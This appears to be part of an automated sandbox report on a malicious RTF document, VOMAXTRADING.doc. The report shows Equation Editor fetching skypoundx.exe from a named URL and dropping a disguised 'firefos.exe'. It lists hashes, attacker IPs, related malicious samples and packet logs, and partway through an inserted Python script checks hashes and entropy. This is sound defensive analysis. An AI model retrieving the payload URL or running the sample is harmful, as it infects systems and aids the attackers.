                                                                                                                                                            http://email.balluun.com/ls/click?upn=vAgQonvqwvuwOYm-2FeLk6JoFNFg3eRlAI8QIEVntBAuI-2BvU3e7BCgAWK4gND5sUFzaOsmo7sSmVoKwCcIxTg-2BFixi2xkEEW0oX1nuZ00rbDRxhHyjyRDdAxKojA59O-2B4AFSpNTWqqEs1z6j5wzlR2-2FBqayO2J83qvH4QoQ-2F3anf0VFAroZ5d-2BXoNmQDglJ5pwxxVoZatBhZPngQRjuQTxew-3D-3DzH4L_3j-2BjdnCo31g6AoJOEEgYaF9xlWteAa1K0Qa8qq9OD9qW7sjFhUMmultTO5jBWtQpNUDwj6PE1qUa9-2BpzdXtC1dfajoy6E591rXly0ybZJZAn8Vxq-2Fq0s46eH6TVCm1b6N0WF6m2Ciw6XuwKQM6-2FvOhmnealyeWsQT6Pbejkt1oPtkbgT9bDnxj2sxfWzdY-2F9GQwHNqRuoi-2FmHeLH7KOkDQ-3D-3DGet hashmaliciousBrowse
                                                                                                                                                            • 104.168.204.104
                                                                                                                                                            MIC Taiwan RFQ.docGet hashmaliciousBrowse
                                                                                                                                                            • 104.168.198.45
                                                                                                                                                            Additional Agreement 2020-KYC.exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.119.68.17
                                                                                                                                                            41126780_Inv0ice_Confirmation.exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.129.253.234
                                                                                                                                                            mFNIsJZPe2.exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.119.68.17
                                                                                                                                                            https://unilever-t.neolane.net/r/?id=he5e7463,33113b4d,33113b55&p1=t-op.xyz/birthday.html?e=am9obi5oZWlubGVpbkBhcm0uY29t%23&p2=&p3=qdxLRv1pgrLmAhpndPonbtt%2FU0Z7whiIJ9RHOsHSwuzr4xxs7s07CQ%3D%3DGet hashmaliciousBrowse
                                                                                                                                                            • 108.174.194.86
                                                                                                                                                            https://compliancetest-my.sharepoint.com/:b:/g/personal/breem_compliancetesting_com/Eea_DqHyOdpKgMecDkmEb-gBbrGjRA3g1tC-Cg8ccbaUzw?e=4%3aKZBmIk&at=9Get hashmaliciousBrowse
                                                                                                                                                            • 23.254.228.188
                                                                                                                                                            Payment09299.exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.236.161.36
                                                                                                                                                            Hydraulex.exeGet hashmaliciousBrowse
                                                                                                                                                            • 23.254.244.17
                                                                                                                                                            Vidoe001mp4.scr signed FAT11 d.o.exeGet hashmaliciousBrowse
                                                                                                                                                            • 108.174.197.5
                                                                                                                                                            0frYk.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 104.168.160.20
                                                                                                                                                            unstr0000.exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.236.249.173
                                                                                                                                                            0frYk.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 104.168.160.20
                                                                                                                                                            PO Price Confirmation.xls.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 104.168.160.20
                                                                                                                                                            PO Price Confirmation.xls.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 104.168.160.20
                                                                                                                                                            https://kumaritechnology.com/PVRREDIRECT/redirect/base64email/c2VjdXJpdHlpbnF1aXJpZXNAc2VhcnNoYy5jb20=Get hashmaliciousBrowse
                                                                                                                                                            • 104.168.243.132
                                                                                                                                                            JaxAdcBV3p.exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.236.178.210
                                                                                                                                                            http://t.mail.sony-europe.com/r/?id=h3a020b08,361606a7,36416ae2&cid=DM66675&bid=973212424&src=eml&resp_id=79681940&ccid=1D2D1F298EDB0AB0239404EADAC9CD2613887304&p1=a-nz.xyz?TUqz0=ZGxva29zQHByb2xpc3QuY29t%23Get hashmaliciousBrowse
                                                                                                                                                            • 23.254.225.75
                                                                                                                                                            QUOTE #9201272.exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.236.194.49
                                                                                                                                                            SQUARESPACEUSanthon.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.185.159.141
                                                                                                                                                            Shipment Document BLINV And Packing List Attached.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.185.159.141
                                                                                                                                                            1Bn2brrsT7.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141
                                                                                                                                                            NQQWym075C.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141
                                                                                                                                                            vOKMFxiCYt.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141
                                                                                                                                                            kayx.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.185.159.141
                                                                                                                                                            BANK ACCOUNT INFO!.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141
                                                                                                                                                            http://WWW.ALYSSA-J-MILANO.COMGet hashmaliciousBrowse
                                                                                                                                                            • 198.185.159.141
                                                                                                                                                            Payment Advice - Advice Ref GLV823990339.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141
                                                                                                                                                            baf6b9fcec491619b45c1dd7db56ad3d.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.177
                                                                                                                                                            http://f69e.engage.squarespace-mail.comGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141
                                                                                                                                                            NEW PO.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.185.159.141
                                                                                                                                                            p8LV1eVFyO.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.177
                                                                                                                                                            dB7XQuemMc.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141
                                                                                                                                                            hRVrTsMv25.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141
                                                                                                                                                            qkN4OZWFG6.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.185.159.144
                                                                                                                                                            kvdYhqN3Nh.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.185.159.144
                                                                                                                                                            NzI1oP5E74.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141
                                                                                                                                                            IQtvZjIdhN.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.177
                                                                                                                                                            PO.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\skypoundx[1].exe
Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:downloaded
Size (bytes):278528
Entropy (8bit):7.931078843712846
Encrypted:false
SSDEEP:6144:Y9Cf0RF9jxtXEtdKKoEml7J9Vz0IFlR/x9SMdGgoJ7tGG:0S0RDfXE3zDml7Zz1FT/x9SLtGG
MD5:EF8FC92D8B47C1F40DD5233AA9B3F260
SHA1:EBBE29AD9CBEEE24AE52A5A77F57D3C0ADD317D9
SHA-256:0757426A4B616E13F2EC816793E22CB933978A99BFC1A771537E68D74AD2D0D0
SHA-512:ED155470CE9FC32A16E2CFED9AC712F5C2EB8AD810BC6BF7C8916FFD3842D133A8B2DC8565C7373C92AF4FBED536C953A65B2019D387EB06DB9F1D5BFD504169
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
IE Cache URL:http://sea-shared-5.masterns.com/~vhlcnlog/ugopoundx/skypoundx.exe
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\.._.....................L........... ... ....@.. ....................................@.................................d...W.... ..8I........................................................................... ............... ..H............text........ ...................... ..`.rsrc...8I... ...J..................@..@.reloc...............>..............@..B........................H.......l...."......C....0...............................................0.............-.&(....+.&+.*....0..........s....(....t.....-.&+......+.*....~....*..0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............,.&(....+.&+.*....0..
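The entry above lists the fields an analyst uses to confirm that a file pulled from the IE cache path is the same artefact the sandbox saw (size, MD5/SHA1/SHA-256/SHA-512, 8-bit entropy, PE type). The following is an added example, not code from the report or from Joe Sandbox, that recomputes those fields and reports which ones disagree with the report's key/value pairs; it also flags a PE whose entropy is near 8 bits per byte (the 7.93 above) as likely packed or encrypted. The packed threshold of 7.2 is an assumed heuristic, and the input bytes are a constructed stand-in, not the real skypoundx.exe.

```python
"""Recompute the per-file metadata a sandbox 'dropped files' entry lists and
diff it against the report. Added example; constructed inputs, assumed threshold."""
import hashlib
import math
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class FileFacts:
    size: int
    md5: str
    sha1: str
    sha256: str
    sha512: str
    entropy: float
    is_pe: bool
    looks_packed: bool


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (the report's 'Entropy (8bit)')."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def is_pe(data: bytes) -> bool:
    """True when an MZ stub's e_lfanew (offset 0x3C) points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def describe(data: bytes, packed_threshold: float = 7.2) -> FileFacts:
    """Hashes and entropy in the same upper-case hex form the report prints.
    packed_threshold is an assumed heuristic, not a value from the report."""
    ent = shannon_entropy(data)
    pe = is_pe(data)
    return FileFacts(
        size=len(data),
        md5=hashlib.md5(data).hexdigest().upper(),
        sha1=hashlib.sha1(data).hexdigest().upper(),
        sha256=hashlib.sha256(data).hexdigest().upper(),
        sha512=hashlib.sha512(data).hexdigest().upper(),
        entropy=ent,
        is_pe=pe,
        looks_packed=pe and ent >= packed_threshold,
    )


def matches_report(data: bytes, reported: Dict[str, object]) -> List[str]:
    """Return the names of report fields whose recomputed value disagrees.
    Only keys present in `reported` are checked; an empty list means verified."""
    facts = describe(data)
    recomputed = {
        "Size (bytes)": str(facts.size),
        "MD5": facts.md5,
        "SHA1": facts.sha1,
        "SHA-256": facts.sha256,
        "SHA-512": facts.sha512,
    }
    mismatches = [k for k, v in recomputed.items()
                  if k in reported and str(reported[k]).upper() != v]
    if "Entropy (8bit)" in reported and \
            abs(float(reported["Entropy (8bit)"]) - facts.entropy) > 1e-6:
        mismatches.append("Entropy (8bit)")
    return mismatches


def build_fake_pe(payload: bytes) -> bytes:
    """Constructed stand-in: minimal MZ stub, e_lfanew=0x40, 'PE\\0\\0', then payload."""
    header = bytearray(b"MZ" + b"\x00" * 0x3A)        # 0x3C bytes
    header += (0x40).to_bytes(4, "little")            # e_lfanew at 0x3C
    header += b"PE\x00\x00"                           # NT signature at 0x40
    return bytes(header) + payload


# Constructed samples (not the report's files): a high-entropy fake PE and a zero buffer.
FAKE_PE = build_fake_pe(bytes(range(256)) * 4)        # 68 + 1024 = 1092 bytes
ZEROS = b"\x00" * 1024

if __name__ == "__main__":
    for name, blob in (("fake_pe", FAKE_PE), ("zeros", ZEROS)):
        f = describe(blob)
        print(f"{name}: size={f.size} sha256={f.sha256} entropy={f.entropy:.3f} "
              f"pe={f.is_pe} packed={f.looks_packed}")
    # The report's MD5 will not match the constructed sample, so this names "MD5".
    print(matches_report(FAKE_PE, {"MD5": "EF8FC92D8B47C1F40DD5233AA9B3F260"}))
```

Run it against the real cached file by replacing the constructed blob with `open(path, "rb").read()` and passing the report's key/value pairs to `matches_report`; a non-empty list means the artefact on disk is not the one the sandbox analysed, which matters when the download URL serves different payloads over time.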
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9A867ADF-3614-4635-BFBB-6C9AC8D8FC42}.tmp
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):15910
                                                                                                                                                            Entropy (8bit):3.6060056836164947
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:Lwr2OJ5BfZYoWdcLEH9+qkoN6HQKWfFoPNgsH0wgNOMkihDKK0SKGKVSR/rHa+:Lc20552/dcLEpkoN6kFolgsUwe8DAR/V
                                                                                                                                                            MD5:B7C7FDADBD941B2641EC39B77CE91005
                                                                                                                                                            SHA1:5DFAFC5DF67D6121306E2E86779856F5105492C4
                                                                                                                                                            SHA-256:7C7AFB0736B7523F61C112904F60ABC2A744BEE1BA82F9B65880AFC915BE0F07
                                                                                                                                                            SHA-512:216AD30F00C0638320EA6DBC72093D10135A0581ED4D1859EDD961D7A506A04418641ACA24AA09A18008FAA80710AC072623560C26FF42A6F32FC42758C37588
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ,.>.1.;.5.1.|.?...=.2.=.8.-.*.].?.8.3._.?.?.?...0.7.?.6.$._.~.#.,.`.|._.>.#.4.'...:.#.0...~.%.-.+.[./.?.`.-.].<.1.?.*.=.6.`.?.1.!.%._.9.%.%.~.?.,.%.?.:.'.:._._.3.&.%...].7.*.'...,.$.>...7...,.9.:.%.:.[.;...>.+.~.0.'.9.8.|.=.[.%...?.$...&...!.-.].3.'.@._.0.&.0.[.:.?.&.^.7.|.^.1.,.?.*.+...2.`.?.]...[.,.?.$.?.~.|._.#.?.].|.8.^.9.?.^.'.(.&.?.?.8.%.7.&.@.7.7.(.`.?.....|.?...>.%.7.=.+...@.8.9.?._.?.2.7.4.?.).%.'.1.+.]._.4.[./.?._.6.5.?.|.#...~.,...$.4.>.@.].-.1.-.2.+.).!....._.?.?.?.0.'.4.-...-.#.0.+.?.1.2.|.?.9.&.+...].7.:.!...1.%.].(.).^.%.1.(.@.`.&.%.?...-.<.%.0.?.6.*.].'./.6.'.).`.<.?.0...(.%.5.[.?...(.+.8.=.%.+.!.=.).7.1.<.4._.?.*.;.#.2.5.#.%.(.&.?.2...).:.0.`...9...'.?.8.2.6.^.%.%...4.?.7.5.%...8.!.3.|.:.2.,.:.0.*...^.%.:.$.|.&.@.?.|.&.'...8.*.5...9...?._.<.,.,.6._.=.9.!.:.+.'._.-.#.+...?.?.7.6.%.#._.'.-.=.?.0.].*.9.<.'.=.:.>.1.%.;.9.5.^.`.8.|.|.'.0.`.1...*.>.].%.?.2.[..._.*.@.@.....9.].%.:.3.8._.!.@.?.?.).;.#.1.?.%.?.@.0.1.>.2.'.:.1...:.$.6.*.?.,.0.?.|.4.?.2.~...3...?.&.3...^.#.4.^.>.
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B65885D3-1CF8-4E74-AA78-05F4F57053A0}.tmp
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1024
                                                                                                                                                            Entropy (8bit):0.05390218305374581
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\VOMAXTRADING.LNK
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Aug 26 14:08:15 2020, atime=Thu Nov 26 15:43:37 2020, length=1677719, window=hide
Category: dropped
Size (bytes): 2048
Entropy (8bit): 4.592219282555606
Encrypted: false
SSDEEP: 48:8o/XT0jFzg+nK1SQh2o/XT0jFzg+nK1SQ/:8o/XojFklSQh2o/XojFklSQ/
MD5: EA51793AD3A560670A797369376A17A4
SHA1: 226070D83E347F57849A2FD702A174CBF4CA34BB
SHA-256: 839D28CDFA52ECC4260EAD6810BDED8DC2A4EA86D8884D68D7F140EBF56DCC1D
SHA-512: 2ED194A371C117671B65D0B91DC52D8A9A2A0860C75410539CCD46F12ECB343D431CFC32FFE539C66089D567DB1C62EB01329EF3AA858B20902990BB6745718F
Malicious: false
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 74
Entropy (8bit): 4.441787744171977
Encrypted: false
SSDEEP: 3:M1//hs23orLhs23omX1//hs23ov:MRC23gG23nC23y
MD5: 71298FC792A38B7B149B2B8EF01DBF34
SHA1: E25BCF5F84E6F9AD6C5075AA5A86FEB6B589414A
SHA-256: CC4CA7D8FE6495FD05F930393742B164F7C624CB7DE500142D92A244D20BA362
SHA-512: 20C2D0BB9EF31EA23BBA7178E74C5C683BBA42C529CB04F6D7AD0FD54F0D0AFEEEEA8B2FB7AECB12A961DB70C44CD471F762E1CDC85084D5DC0C1895337A6730
Malicious: false
Preview: [doc]..VOMAXTRADING.LNK=0..VOMAXTRADING.LNK=0..[doc]..VOMAXTRADING.LNK=0..
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 162
Entropy (8bit): 2.431160061181642
Encrypted: false
SSDEEP: 3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
MD5: 4A5DFFE330E8BBBF59615CB0C71B87BE
SHA1: 7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
SHA-256: D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
SHA-512: 3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
Malicious: false
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
Process: C:\Users\user\AppData\Roaming\skypound83892.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 278528
Entropy (8bit): 7.931078843712846
Encrypted: false
SSDEEP: 6144:Y9Cf0RF9jxtXEtdKKoEml7J9Vz0IFlR/x9SMdGgoJ7tGG:0S0RDfXE3zDml7Zz1FT/x9SLtGG
MD5: EF8FC92D8B47C1F40DD5233AA9B3F260
SHA1: EBBE29AD9CBEEE24AE52A5A77F57D3C0ADD317D9
SHA-256: 0757426A4B616E13F2EC816793E22CB933978A99BFC1A771537E68D74AD2D0D0
SHA-512: ED155470CE9FC32A16E2CFED9AC712F5C2EB8AD810BC6BF7C8916FFD3842D133A8B2DC8565C7373C92AF4FBED536C953A65B2019D387EB06DB9F1D5BFD504169
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
C:\Users\user\AppData\Roaming\skypound83892.exe
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 278528
Entropy (8bit): 7.931078843712846
Encrypted: false
SSDEEP: 6144:Y9Cf0RF9jxtXEtdKKoEml7J9Vz0IFlR/x9SMdGgoJ7tGG:0S0RDfXE3zDml7Zz1FT/x9SLtGG
MD5: EF8FC92D8B47C1F40DD5233AA9B3F260
SHA1: EBBE29AD9CBEEE24AE52A5A77F57D3C0ADD317D9
SHA-256: 0757426A4B616E13F2EC816793E22CB933978A99BFC1A771537E68D74AD2D0D0
SHA-512: ED155470CE9FC32A16E2CFED9AC712F5C2EB8AD810BC6BF7C8916FFD3842D133A8B2DC8565C7373C92AF4FBED536C953A65B2019D387EB06DB9F1D5BFD504169
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
C:\Users\user\Desktop\~$MAXTRADING.doc
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 162
Entropy (8bit): 2.431160061181642
Encrypted: false
SSDEEP: 3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
MD5: 4A5DFFE330E8BBBF59615CB0C71B87BE
SHA1: 7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
SHA-256: D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
SHA-512: 3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
Malicious: false

Static File Info

General

File type: Rich Text Format data, unknown version
Entropy (8bit): 4.036944960469874
TrID:
• Rich Text Format (5005/1) 55.56%
• Rich Text Format (4004/1) 44.44%
File name: VOMAXTRADING.doc
File size: 1677719
MD5: 30244581b41accd77dab936571e0d87e
SHA1: 46ddb3fa250dfb4808c3a43f7846d7c643a4f325
SHA256: 2664162d0341d8e5cf1cf3a290b77406d87111e3c9ff3fcf3a4f0836d15d3afe
SHA512: 485074c33256cd04b80f1f58297f5d26f55be56cd8837d35a825d8612407b310bfa29cde9e1934eec92da0a77b37f6e21f0ced9e3ce731ed8673c4b4da82f00e
SSDEEP: 24576:8eqGjcemPSHjVfwQVPx830KDxaeb7uL4RUYspUNt9DzSae7TTyCACNy9r9JK3E3t:W

File Icon

Icon Hash: e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
0 | 00001CCBh | 2 | embedded | eQuATION.3 | 834994 | | | | no

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
11/26/20-08:46:10.744772 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49170 | 34.102.136.180 | 192.168.2.22

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 26, 2020 08:44:06.539177895 CET | 49167 | 80 | 192.168.2.22 | 104.168.198.45
Nov 26, 2020 08:44:06.719369888 CET | 80 | 49167 | 104.168.198.45 | 192.168.2.22
Nov 26, 2020 08:44:06.719521046 CET | 49167 | 80 | 192.168.2.22 | 104.168.198.45
Nov 26, 2020 08:44:06.720232010 CET | 49167 | 80 | 192.168.2.22 | 104.168.198.45
Nov 26, 2020 08:44:06.900260925 CET | 80 | 49167 | 104.168.198.45 | 192.168.2.22
Nov 26, 2020 08:44:06.900933027 CET | 80 | 49167 | 104.168.198.45 | 192.168.2.22
Nov 26, 2020 08:44:06.900969982 CET | 80 | 49167 | 104.168.198.45 | 192.168.2.22
Nov 26, 2020 08:44:06.900993109 CET | 80 | 49167 | 104.168.198.45 | 192.168.2.22
Nov 26, 2020 08:44:06.901015997 CET | 80 | 49167 | 104.168.198.45 | 192.168.2.22
Nov 26, 2020 08:44:06.901037931 CET | 80 | 49167 | 104.168.198.45 | 192.168.2.22
Nov 26, 2020 08:44:06.901063919 CET | 80 | 49167 | 104.168.198.45 | 192.168.2.22
Nov 26, 2020 08:44:06.901091099 CET | 80 | 49167 | 104.168.198.45 | 192.168.2.22
Nov 26, 2020 08:44:06.901108980 CET | 49167 | 80 | 192.168.2.22 | 104.168.198.45
Nov 26, 2020 08:44:06.901110888 CET | 80 | 49167 | 104.168.198.45 | 192.168.2.22
Nov 26, 2020 08:44:06.901134968 CET | 80 | 49167 | 104.168.198.45 | 192.168.2.22
Nov 26, 2020 08:44:06.901139021 CET | 49167 | 80 | 192.168.2.22 | 104.168.198.45
Nov 26, 2020 08:44:06.901144028 CET | 49167 | 80 | 192.168.2.22 | 104.168.198.45
Nov 26, 2020 08:44:06.901148081 CET | 49167 | 80 | 192.168.2.22 | 104.168.198.45
Nov 26, 2020 08:44:06.901159048 CET | 80 | 49167 | 104.168.198.45 | 192.168.2.22
Nov 26, 2020 08:44:06.901165962 CET | 49167 | 80 | 192.168.2.22 | 104.168.198.45
Nov 26, 2020 08:44:06.901185989 CET | 49167 | 80 | 192.168.2.22 | 104.168.198.45
Nov 26, 2020 08:44:06.901226044 CET | 49167 | 80 | 192.168.2.22 | 104.168.198.45
Nov 26, 2020 08:44:06.908030987 CET | 49167 | 80 | 192.168.2.22 | 104.168.198.45
Nov 26, 2020 08:44:07.117697954 CET | 80 | 49167 | 104.168.198.45 | 192.168.2.22
Nov 26, 2020 08:44:07.117738008 CET | 80 | 49167 | 104.168.198.45 | 192.168.2.22
Nov 26, 2020 08:44:07.117760897 CET | 80 | 49167 | 104.168.198.45 | 192.168.2.22
Nov 26, 2020 08:44:07.117782116 CET | 80 | 49167 | 104.168.198.45 | 192.168.2.22
Nov 26, 2020 08:44:07.117804050 CET | 80 | 49167 | 104.168.198.45 | 192.168.2.22
Nov 26, 2020 08:44:07.117820978 CET | 80 | 49167 | 104.168.198.45 | 192.168.2.22
Nov 26, 2020 08:44:07.117836952 CET | 80 | 49167 | 104.168.198.45 | 192.168.2.22
Nov 26, 2020 08:44:07.117851973 CET | 80 | 49167 | 104.168.198.45 | 192.168.2.22
Nov 26, 2020 08:44:07.117867947 CET | 80 | 49167 | 104.168.198.45 | 192.168.2.22
Nov 26, 2020 08:44:07.117887020 CET | 80 | 49167 | 104.168.198.45 | 192.168.2.22
Nov 26, 2020 08:44:07.117899895 CET | 80 | 49167 | 104.168.198.45 | 192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117912054 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117928028 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117944002 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117960930 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117961884 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.117974043 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117985964 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117997885 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.118005037 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.118057013 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.118916035 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.118940115 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.118998051 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.119949102 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298139095 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298182011 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298197985 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298209906 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298222065 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298238993 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298255920 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298273087 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298286915 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298305988 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298330069 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298347950 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298372984 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298393965 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298413992 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298434973 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298453093 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298475027 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298475027 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298499107 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298499107 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298501968 CET4916780192.168.2.22104.168.198.45
